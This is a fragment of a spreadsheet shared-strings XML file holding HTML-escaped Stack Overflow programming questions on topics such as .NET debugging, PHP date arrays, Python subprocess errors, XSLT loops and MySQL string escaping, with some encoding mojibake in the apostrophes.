    <t xml:space="preserve">&lt;p&gt;I'm currently building a project and I would like to make use of some simple javascript - I know some people have it disabled to prevent XSS and other things. Should I...&lt;/p&gt;
&lt;p&gt;a) Use the simple javascript, those users with it disabled are missing out&lt;/p&gt;
&lt;p&gt;b) Don't use the simple javascript, users with it enabled have to click a little more&lt;/p&gt;
&lt;p&gt;c) Code both javascript-enabled and javascript-disabled functionality&lt;/p&gt;
&lt;p&gt;I'm not really sure as the web is always changing, what do you recommend?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Debug .NET Mobile Device Application using multiple instances of Device Emulator</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to Debug .NET Mobile Device Application using multiple instances of Device Emulator.  If I right click the project and go to Debug -&gt; Start new instance in Visual Studio 2008 when an instance is already running I get the error&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Unable to copy file
  "obj\Debug\MyMobileApp.exe" to
  "bin\Debug\MyMobileApp.exe". The
  process cannot access the file
  'bin\Debug\MyMobileApp.exe' because it
  is being used by another process.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Does anyone know if and how I can do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Matrix Template Library matrix inversion</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to inverse a matrix with version Boost boost_1_37_0 and MTL mtl4-alpha-1-r6418. I can't seem to locate the matrix inversion code. I've googled for examples and they seem to reference lu.h that seems to be missing in the above release(s). Any hints?&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/users/8643/matt-cruikshank"&gt;@Matt&lt;/a&gt; suggested copying lu.h, but that seems to be from MTL2 rather than MTL4. I'm having trouble compiling with MTL2 with VS05 or higher. &lt;/p&gt;
&lt;p&gt;So, any idea how to do a matrix inversion in MTL4?&lt;/p&gt;
&lt;p&gt;Update: I think I understand Matt better and I'm heading down &lt;a href="http://www.osl.iu.edu/research/itl/" rel="nofollow"&gt;this ITL path&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create an Array of the Last 30 Days Using PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to create an array starting with today and going back the last 30 days with PHP and I am having trouble.  I can estimate but I donâ€™t know a good way of doing it and taking into account the number of days in the previous month etc.  Does anyone have a good solution? I canâ€™t get close but I need to make sure it is 100% accurate.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python subprocess.call() fails when using pythonw.exe</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some Python code that works correctly when I use python.exe to run it, but fails if I use pythonw.exe.&lt;/p&gt;
&lt;pre&gt;
    def runStuff(commandLine):
        outputFileName = 'somefile.txt'
        outputFile = open(outputFileName, "w")
        try:
            result = subprocess.call(commandLine, shell=True, stdout=outputFile)
        except:
            print 'Exception thrown:', str(sys.exc_info()[1])
    myThread = threading.Thread(None, target=runStuff, commandLine=['whatever...'])
    myThread.start()
&lt;/pre&gt;
&lt;p&gt;The message I get is:&lt;/p&gt;
&lt;pre&gt;
    Exception thrown: [Error 6] The handle is invalid
&lt;/pre&gt;
&lt;p&gt;However, if I don't specify the 'stdout' parameter, subprocess.call() starts okay.&lt;/p&gt;
&lt;p&gt;I can see that pythonw.exe might be redirecting output itself, but I can't see why I'm blocked from specifying stdout for a new thread.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SubSonic "Version" fails due to missing dependencies</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using SubSonic 2.1 Final but having problems running "Version" with the SubCommander. I think this problem began when I installed SQL Server 2008 on my local machine and removed 2005.&lt;/p&gt;
&lt;p&gt;This is the error I get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ERROR: Trying to execute Version
Error Message: System.IO.FileNotFoundException: Could not load file or assembly 'Microsoft.SqlServer.SmoEnum, Version=9.0.242.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91' or one of its dependencies. The system cannot find the file specified.
File name: 'Microsoft.SqlServer.SmoEnum, Version=9.0.242.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91'
   at Microsoft.SqlServer.Management.Smo.SqlSmoObject.GetDbCollation(String dbname)
   at Microsoft.SqlServer.Management.Smo.SqlSmoObject.GetDbComparer(Boolean inServer)
   at Microsoft.SqlServer.Management.Smo.SqlSmoObject.InitializeStringComparer()
   at Microsoft.SqlServer.Management.Smo.AbstractCollectionBase.get_StringComparer()
   at Microsoft.SqlServer.Management.Smo.SimpleObjectCollectionBase.InitInnerCollection()
   at Microsoft.SqlServer.Management.Smo.SmoCollectionBase.get_InternalStorage()
   at Microsoft.SqlServer.Management.Smo.SmoCollectionBase.GetObjectByKey(ObjectKeyBase key)
   at Microsoft.SqlServer.Management.Smo.DatabaseCollection.get_Item(String name)
   at SubSonic.SubCommander.DBScripter.ScriptSchema(String connectionString) in C:\svn\subsonicproject\trunk\SubCommander\DBScripter.cs:line 51
   at SubSonic.SubCommander.Program.ScriptSchema() in C:\svn\subsonicproject\trunk\SubCommander\Program.cs:line 696
   at SubSonic.SubCommander.Program.Main(String[] args) in C:\svn\subsonicproject\trunk\SubCommander\Program.cs:line 68
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Anybody knows how to make this work?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Avoiding a javascript race condition</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's the scenario:&lt;/p&gt;
&lt;p&gt;My users are presented a grid, basically, a stripped down version of a spreadsheet.  There are textboxes in each row in the grid.  When they change a value in a textbox, I'm performing validation on their input, updating the collection that's driving the grid, and redrawing the subtotals on the page.  This is all handled by the OnChange event of each textbox.&lt;/p&gt;
&lt;p&gt;When they click the "Save" button, I'm using the button's OnClick event to perform some final validation on the amounts, and then send their entire input to a web service, saving it.&lt;/p&gt;
&lt;p&gt;At least, that's what happens if they tab through the form to the Submit button.&lt;/p&gt;
&lt;p&gt;The problem is, if they enter a value, then immediately click the save button, SaveForm() starts executing before UserInputChanged() completes -- a race condition.  My code does not use setTimeout, but I'm using it to simulate the sluggish UserInputChanged validation code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;lt;!-- snip --&amp;gt;
 &amp;lt;script&amp;gt;
    var amount = null;
    var currentControl = null;
    function UserInputChanged(control) {
        currentControl = control;
        // use setTimeout to simulate slow validation code (production code does not use setTimeout)
        setTimeout("ValidateAmount()", 100); 
    }
    function SaveForm() {
        // call web service to save value
        document.getElementById("SavedAmount").innerHTML = amount;
    }
    function ValidateAmount() {
        // various validationey functions here
        amount = currentControl.value; // save value to collection
        document.getElementById("Subtotal").innerHTML = amount; // update subtotals
    }
&amp;lt;/script&amp;gt;
&amp;lt;!-- snip --&amp;gt;
Amount: &amp;lt;input type="text" id="UserInputValue" onchange="UserInputChanged(this);" /&amp;gt; &amp;lt;br /&amp;gt;
Subtotal: &amp;lt;span id="Subtotal"&amp;gt;&amp;lt;/span&amp;gt; &amp;lt;br /&amp;gt;
&amp;lt;input type="button" onclick="SaveForm();" value="Save" /&amp;gt; &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;
Saved amount: &amp;lt;span id="SavedAmount"&amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;!-- snip --&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don't think I can speed up the validation code -- it's pretty lightweight, but apparently, slow enough that code tries to call the web service before the validation is complete.&lt;/p&gt;
&lt;p&gt;On my machine, ~95ms is the magic number between whether the validation code executes before the save code begins.  This may be higher or lower depending on the users' computer speed.  &lt;/p&gt;
&lt;p&gt;Does anyone have any ideas how to handle this condition?  A coworker suggested using a semaphore while the validation code is running and a busy loop in the save code to wait until the semaphore unlocks -- but I'd like to avoid using any sort of busy loop in my code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Suggest a good PHP wiki engine</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a small wiki engine that is easy to embed into an existing PHP application.  Or perhaps a set of libraries to handle all the typical wiki functions.&lt;/p&gt;
&lt;p&gt;Currently I am using &lt;a href="http://erfurtwiki.sourceforge.net/"&gt;ErfurtWiki&lt;/a&gt;, but it is starting to show its age.  It hasn't been updated since 2005, and several of the pages on sourceforge appear to have been &lt;a href="http://erfurtwiki.sourceforge.net/MailingList"&gt;hacked&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I will be including it with a GPLv2 application so a GPL compatible license is important.&lt;/p&gt;
&lt;p&gt;Edit:&lt;/p&gt;
&lt;p&gt;To update, mostly I am just looking for text formatting/parser functionality.  I want to deal with the storage, security, rev history, etc on my own.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Warnings using format strings with sprintf() in C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Compiling this lines&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    long int sz;
    char tmpret[128];
    //take substring of c, translate in c string, convert to int, 
    //and multiply with 1024
    sz=atoi(c.substr(0,pos).c_str())*1024;
    snprintf(tmpret,128,"%l",sz);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I read two warning on snprintf line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; warning: conversion lacks type at end of format
 warning: too many arguments for format
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why? The type is specified (long int sz, and %l in snprintf) and the argument in snprintf is only one. Can anybody help me? Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio 2008 sometimes won't open .aspx html markup</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Every now and again I encounter a problem where Visual Studio Professional 2008 (SP1) refuses to open an aspx page.  My site is in a Web Application Project. &lt;/p&gt;
&lt;p&gt;Double clicking on the aspx page in solution explorer just causes the tree view node with the code behind and .designer.cs to collapse and expand, it's almost as if VS thinks the file is already open, but it's definately not. &lt;/p&gt;
&lt;p&gt;I've also tried right-click + View Markup or View Designer but no joy. I also tried unloading/reloading the project in solution explorer but that doesn't solve the problem either, I actually have to close the whole solution then re-open again (which can take a while if there's lots of projects in the solution).&lt;/p&gt;
&lt;p&gt;This sometimes happens on just one or two files, others open without any problems. Anyone else seen this and know of any work arounds and cause?&lt;/p&gt;
&lt;p&gt;Cheers&lt;br /&gt;
Kev&lt;/p&gt;
</t>
  </si>
  <si>
    <t>TimedRotatingFileHandler Changing File Name?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to implement the python logging handler called TimedRotatingFileHandler. &lt;/p&gt;
&lt;p&gt;When it rolls over to midnight it appends the current day in the form: "YYYY-MM-DD".&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;LOGGING_MSG_FORMAT  = '%(name)-14s &amp;gt; [%(levelname)s] [%(asctime)s] : %(message)s'
LOGGING_DATE_FORMAT	= '%Y-%m-%d %H:%M:%S'
logging.basicConfig(
			level=logging.DEBUG,
			format=LOGGING_MSG_FORMAT,
			datefmt=LOGGING_DATE_FORMAT
			)
root_logger = logging.getLogger('')
logger = logging.handlers.TimedRotatingFileHandler("C:\\logs\\Rotate_Test",'midnight',1)
root_logger.addHandler(logger)
while True:
	daemon_logger = logging.getLogger('TEST')
	daemon_logger.info("SDFKLDSKLFFJKLSDD")
	time.sleep(60)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first log file created is called just "Rotate_Test" then once it rolls over to the next day it changes the file name to: "Rotate_Test.YYYY-MM-DD" Where YYYY-MM-DD is the current day.&lt;/p&gt;
&lt;p&gt;How can i change how it alters the filename? I googled and looked at the API and found pretty much nothing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>GUI App with Visual C++ Express Edition</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What tool (preferably free) can be used with Visual C++ 2008 Express Edition to create Win32 GUI applications? As you know the Express Edition does not include a GUI resource editor.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is special about HashSet&lt;T&gt; in .NET 3.5?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's an interesting puzzle.&lt;/p&gt;
&lt;p&gt;I downloaded Snippet Compiler to try some stuff out, and wanted to write the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using System.Collections.Generic;
public class MyClass
{
    public static void RunSnippet()
    {
    	HashSet&amp;lt;int&amp;gt; h = new HashSet&amp;lt;int&amp;gt;();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But the above code doesn't compile. I get:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;"The type or namespace name 'HashSet'
  could not be found (are you missing a
  using directive or an assembly
  reference?)"&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Clearly I'm not. It seems it can't find HashSet, yet it finds other types in the Systems.Collections.Generic namespace (e.g. List, SortedDictionary).&lt;/p&gt;
&lt;p&gt;What's the explanation for this? Presumeably Snippet Compiler is just using the standard Framework compiler under the covers...&lt;/p&gt;
&lt;p&gt;I would be interested to know why this doesn't work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I find the type of the object instance of the caller of the current function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Currently I have the function CreateLog() for creating a a log4net Log with name after the constructing instance's class. 
Typically used as in:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class MessageReceiver
{
     protected ILog Log = Util.CreateLog();
     ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If we remove lots of error handling the implementation boils down to:
[EDIT: Please read the longer version of CreateLog further on in this post.]&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public ILog CreateLog()
{
        System.Diagnostics.StackFrame stackFrame = new System.Diagnostics.StackFrame(1);
        System.Reflection.MethodBase method = stackFrame.GetMethod();
        return CreateLogWithName(method.DeclaringType.FullName);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Problem is that if we inheirit MessageReceiver into sub classes the log will still take its name from MessageReceiver since this is the declaring class of the method (constructor) which calls CreateLog.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class IMReceiver : MessageReceiver
{ ... }
class EmailReceiver : MessageReceiver
{ ... }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Instances of both these classes would get Logs with name "MessageReceiver" while I would like them to be given names "IMReceiver" and "EmailReceiver".&lt;/p&gt;
&lt;p&gt;I know this can easily be done (and is done) by passing a reference to the object in creation when calling CreateLog since the GetType() method on object does what I want.&lt;/p&gt;
&lt;p&gt;There are some minor reasons to prefer not adding the parameter and personally I feel disturbed by not finding a solution with no extra argument.&lt;/p&gt;
&lt;p&gt;Is there anyone who can show me how to implement a zero argument CreateLog() that gets the name from the subclass and not the declaring class?&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;The CreateLog function does more than mentioned above. The reason for having one log per instance is to be able to differ between different instances in the logfile. This is enforced by the CreateLog/CreateLogWithName pair.&lt;/p&gt;
&lt;p&gt;Expanding on the functionality of CreateLog() to motivate its existence.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public ILog CreateLog()
{
        System.Diagnostics.StackFrame stackFrame = new System.Diagnostics.StackFrame(1);
        System.Reflection.MethodBase method = stackFrame.GetMethod();
        Type type = method.DeclaringType;
        if (method.IsStatic)
        {
            return CreateLogWithName(type.FullName);
        }
        else
        {
            return CreateLogWithName(type.FullName + "-" + GetAndInstanceCountFor(type));
        }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also I prefer writing ILog Log = Util.CreateLog(); rather than copying in some long cryptic line from an other file whenever I write a new class. I am aware that the reflection used in Util.CreateLog is not guaranteed to work though - is System.Reflection.MethodBase.GetCurrentMethod() guaranteed to work?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why use hashing to create pathnames for large collections of files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I noticed a number of cases where an application or database stored collections of files/blobs using a has to determine the path and filename. I believe the intended outcome is a situation where the path never gets too deep, or the folders ever get too full - too many files (or folders) in a folder making for slower access. &lt;/p&gt;
&lt;p&gt;EDIT: Examples are often Digital libraries or repositories, though the simplest example I can think of (that can be installed in about 30s) is the &lt;a href="http://zotero.org" rel="nofollow"&gt;Zotero document/citation database.&lt;/a&gt; &lt;/p&gt;
&lt;p&gt;Why do this? &lt;/p&gt;
&lt;p&gt;EDIT: thanks Mat for the answer - does this technique of using a hash to create a file path have a name? Is it a &lt;em&gt;pattern&lt;/em&gt;? I'd like to read more, but have failed to find anything in the &lt;a href="http://portal.acm.org/portal.cfm" rel="nofollow"&gt;ACM Digital Library&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Simple protocol for remote process startup/shutdown</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a simple protocol to control remote processes from one managing application. The remote processes will run on Windows and Linux (x86).&lt;/p&gt;
&lt;p&gt;Is there a simple protocol for managing remote processes, for which I could find daemons that run on both Windows and Linux?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Create a Listener for WCF ServiceHost events when service is hosted under IIS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a WCF service which will be hosted under IIS. Now I have some resources(Connections) that I create within service constructor. I need to free up those resources when IIS which is hosting the service shuts down or resets. These are not the resources that I will be clearing out every time client disconnects but they are application wide resources which will only free up when the service itself or IIS shuts down.&lt;/p&gt;
&lt;p&gt;I saw another post where someone mentioned that he has created a listener to capture the events of &lt;code&gt;ServiceHost&lt;/code&gt;.  Can someone help me with figuring out how to get a handle of the &lt;code&gt;ServiceHost&lt;/code&gt; and capture the IIS reset or IIS shutdown event and free up my resources in WCF service?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the Managed C++ equivalent to the C# using statement</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How would one code the following C# code in Managed C++&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void Foo()
{
    using (SqlConnection con = new SqlConnection("connectionStringGoesHere"))
    {
         //do stuff
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Clarificaton:&lt;/strong&gt;
For managed objects.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get rid of .. Replace(Replace(Replace(Replace(Replace( â€¦?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Iâ€™m selecting data on an old database which has an abused status column.  The status column has multiple pieces of information in it.  Values are like â€˜New Contact YYYYâ€™, â€˜Online YYYYâ€™, â€˜Updated YYYYâ€™, â€˜Withdrawn YYYYâ€™, etcâ€¦. As you may have guessed, YYYY represents the year â€¦ which I need.&lt;/p&gt;
&lt;p&gt;In the past Iâ€™ve done something similar to &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Rtrim( ltrim( Replace(Replace(Replace(Replace(Replace( â€¦
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Basically, replacing all text values with an empty string, so the only thing that still exists is the year.  I can still do this, but Iâ€™m thinking this is ridiculous, and thereâ€™s got to be a better way.&lt;/p&gt;
&lt;p&gt;Does anybody know of a better way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>xsl:for-each loop counter</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I save the iterations that have occurred in an xsl:for-each? (variables in XSL are immutable)&lt;/p&gt;
&lt;p&gt;My goal is to find the MAX number of children for any node at a particular level.&lt;/p&gt;
&lt;p&gt;For example, I might want to print that there are no more than 2 Response nodes for any Question in this survey:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="ISO-8859-1"?&amp;gt;
&amp;lt;?xml-stylesheet type="text/xsl" href="testing.xsl"?&amp;gt;
&amp;lt;Survey&amp;gt;
  &amp;lt;Question&amp;gt;
    &amp;lt;Response text="Website" /&amp;gt;
    &amp;lt;Response text="Print Ad" /&amp;gt;
  &amp;lt;/Question&amp;gt;
  &amp;lt;Question&amp;gt;
    &amp;lt;Response text="Yes" /&amp;gt;
  &amp;lt;/Question&amp;gt;
&amp;lt;/Survey&amp;gt;
&amp;lt;xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"&amp;gt;
&amp;lt;xsl:output method="xml" version="1.0" encoding="UTF-8" indent="yes"/&amp;gt;
&amp;lt;xsl:template match="/"&amp;gt;
  &amp;lt;html&amp;gt;
  &amp;lt;head&amp;gt;
  &amp;lt;/head&amp;gt;
  &amp;lt;body&amp;gt;
    &amp;lt;xsl:for-each select="Survey"&amp;gt;
      The survey has &amp;lt;xsl:value-of select="count(child::Question)"/&amp;gt; questions.  
      &amp;lt;br /&amp;gt;
      &amp;lt;xsl:variable name="counter"&amp;gt;0&amp;lt;/xsl:variable&amp;gt;
      &amp;lt;xsl:for-each select="Question"&amp;gt;
        &amp;lt;!-- TODO: increment the counter ??????? --&amp;gt;
      &amp;lt;/xsl:for-each&amp;gt;
      No more than &amp;lt;xsl:value-of select="$counter"/&amp;gt; responses were returned for any question.
    &amp;lt;/xsl:for-each&amp;gt;
  &amp;lt;/body&amp;gt;
  &amp;lt;/html&amp;gt;
&amp;lt;/xsl:template&amp;gt;
&amp;lt;/xsl:stylesheet&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I render a partial of a different format in Rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to generate a JSON response that includes some HTML.  Thus, I have &lt;code&gt;/app/views/foo/bar.json.erb&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  someKey: 'some value',
  someHTML: "&amp;lt;%= h render(:partial =&amp;gt; '/foo/baz') -%&amp;gt;"
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want it to render &lt;code&gt;/app/views/foo/_baz.html.erb&lt;/code&gt;, but it will only render &lt;code&gt;/app/views/foo/_baz.json.erb&lt;/code&gt;.  Passing &lt;code&gt;:format =&amp;gt; 'html'&lt;/code&gt; doesn't help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Extracting individual digits from a float</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been banging my head on this one all day.  The C++ project I am currently working on has a requirement to display an editable value.  The currently selected digit displays the incremented value above and decremented value below for said digit.  It is useful to be able to reference the editable value as both a number and collection of digits.  What would be awesome is if there was some indexable form of a floating point number, but I have been unable to find such a solution.  I am throwing this question out there to see if there is something obvious I am missing or if I should just roll my own.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Thanks for the advice!  I was hoping for a solution that wouldn't convert from float -&gt; string -&gt; int, but I &lt;em&gt;think&lt;/em&gt; that is the best way to get away from floating point quantization issues.  I ended up going with boost::format and just referencing the individual characters of the string.  I can't see that being a huge performance difference compared to using combinations of modf and fmod to attempt to get a digit out of a float (It probably does just that behind the scenes, only more robustly than my implementation).  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unable to commit to Subversion</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a client who had to rebuild his automated build server. He checked out his project folder from my subversion server but is now no longer able to commit - he gets this error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Error: Commit failed (details follow):  
Error: Cannot write to the prototype revision file of transaction
'551-1' because a   
Error: previous representation is currently being written by another
process  
Finished!:
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have searched Google but although this error has been often reported there is no clear explanation - does anyone on StackOverflow have a solution?&lt;/p&gt;
&lt;p&gt;UPDATE: Nobody else commits to that repository, so it was not a transaction stuck (at least not from another user). In the end we found that permissions were not set correctly. Not that you would know it from this message, but that fixed the problem.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL/PHP - escaping characters that may slow my database down (or make it perform unexpectedly)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I run all my integers through a &lt;code&gt;(int)Integer&lt;/code&gt; to make them safe to use in my query strings.&lt;/p&gt;
&lt;p&gt;I also run my strings through this function code:-&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if(!get_magic_quotes_gpc()) {
           $string = mysql_real_escape_string($string);
        }
$pattern = array("\\'", "\\\"", "\\\\", "\\0");
$replace = array("", "", "", "");
if(preg_match("/[\\\\'\"\\0]/", str_replace($pattern, $replace, $string))) $string = addslashes($string); 
$cleanedString = str_replace('%','',$string);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I obviously return the $cleanedString variable. Now I replace the % character because it is a wildcard to mySQL and it could potentially slow down my queries (or make them return incorrect data) if the user inserted them. Are there any other special characters for mySQL I should be concerned about? &lt;/p&gt;
&lt;p&gt;On a second note, is there anything wrong or redundant about my search and replace after the &lt;code&gt;mysql_real_escape_string&lt;/code&gt;? I got it from a website when I was first starting out and (if I remember correctly) it said you had to use this search/replace in addition to the escape string. It looks like it's trying to remove any previously escaped injection characters?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Can I Create Rounded Rectangle Buttons in WM6?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Yes, like those pretty buttons on the iPhone.   ;)&lt;/p&gt;
&lt;p&gt;I've been searching and reading for days now and everytime I find something that will get me close (like CreateRoundRectRgn), it blows up because Windows Mobile 6 GDI+ doesn't support it.&lt;/p&gt;
&lt;p&gt;I can do the whole owner draw thing and such.  But how do I curve those hard corners and reshape a button?      :/&lt;/p&gt;
&lt;p&gt;Note Tools available:  Native Win32 only  (no MFC)&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;That thought has occured to me, but it leaves two issues:&lt;/p&gt;
&lt;p&gt;1)  Won't the bitmap with rounded edges still leave the corners of the button visible.&lt;/p&gt;
&lt;p&gt;2)  Bitmaps are great for fixed screen size.  But having a variety of resolutions, my goal is to dynamically create the button bitmap in memory at run-time and use it that way.&lt;/p&gt;
&lt;p&gt;I've got it working with square buttons.  Yet I have seen rounded edge buttons used by other software.  There &lt;strong&gt;&lt;em&gt;must&lt;/em&gt;&lt;/strong&gt; be a way to reshape buttons.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Yet Another Divs vs Tables issue: Forms</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;[Meta-note:] I was browsing the question page, getting really tired of "DIVS vs Tables" "When to use tables vs DIVS" "Are Divs better than Tables" "Tables versus CSS" and all the questions that ask &lt;em&gt;THE SAME THING OMG PEOPLE&lt;/em&gt; but I would like to see all the ways people tackle the translation of the canonical example of "why you should give up and use tables":&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;table&amp;gt;
  &amp;lt;tr&amp;gt;
    &amp;lt;td&amp;gt; Name &amp;lt;/td&amp;gt;
    &amp;lt;td&amp;gt; &amp;lt;input&amp;gt; &amp;lt;/td&amp;gt;
  &amp;lt;/tr&amp;gt;
  &amp;lt;tr&amp;gt;
    &amp;lt;td&amp;gt; Social Security Number &amp;lt;/td&amp;gt;
    &amp;lt;td&amp;gt; &amp;lt;input&amp;gt; &amp;lt;/td&amp;gt;
  &amp;lt;/tr&amp;gt;
&amp;lt;/table&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;b&gt; Question: &lt;/b&gt; How to best (semantically, simply, robustly, fluidly, portably) implement the above without tables. For starters, I guess a naive implementation uses a fixed column width for the first column, but that can have iffy results for dynamically generated content. Including strengths/weaknesses of your approach in the answer would be nice.&lt;/p&gt;
&lt;p&gt;P.S. Another one I wonder about a lot is vertical centering but the hack for that is covered pretty well at &lt;a href="http://www.jakpsatweb.cz/css/css-vertical-center-solution.html"&gt;jakpsatweb.cz&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;EDIT: scunlife brings up a good example of why I didn't think out the problem that carefully. Tables can align multiple columns simultaneously. The Question still stands (I'd like to see different CSS techniques used for alignment/layout) - although solutions that can handle his? more involved example definitely are preferred.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript form validation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to figure out what would be the simplest way to validate required fields without having to do an if statement for each element's name. Perhaps just with a loop and verify its class.&lt;/p&gt;
&lt;p&gt;What I'm trying to accomplish is to check only the ones that have the class name as "required"&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input name="a1" class="required" type="text" /&amp;gt;
&amp;lt;input name="a2" class="" type="text" /&amp;gt;
&amp;lt;input name="a3" class="required" type="text" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I add sessions to my Perl web app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to maintain state in my Perl web app.  How can I do this effectively?  I looked at CGI::Session but it says that it doesn't work well with UTF-8 pages, which is a requirement.  I'd also like to be able to pass some basic information to another Java application running on the Glassfish app server, so people aren't forced to login to both apps, for example.  How can all this be managed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I load arbitrary data from a url PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This question is simple. What function would I use in a PHP script to load data from a URL into a string?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HTML over flash without stopping interaction with flash</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a html div layered on top of an interactive flash movie, but when the mouse moves over the div, it can't interact with the flash (the view changes as the mouse moves or is clicked). Is there a way to have the flash recieve the mouse movements and clicks but leaving the html visible?&lt;/p&gt;
&lt;p&gt;I can't modify the flash SWF file.&lt;/p&gt;
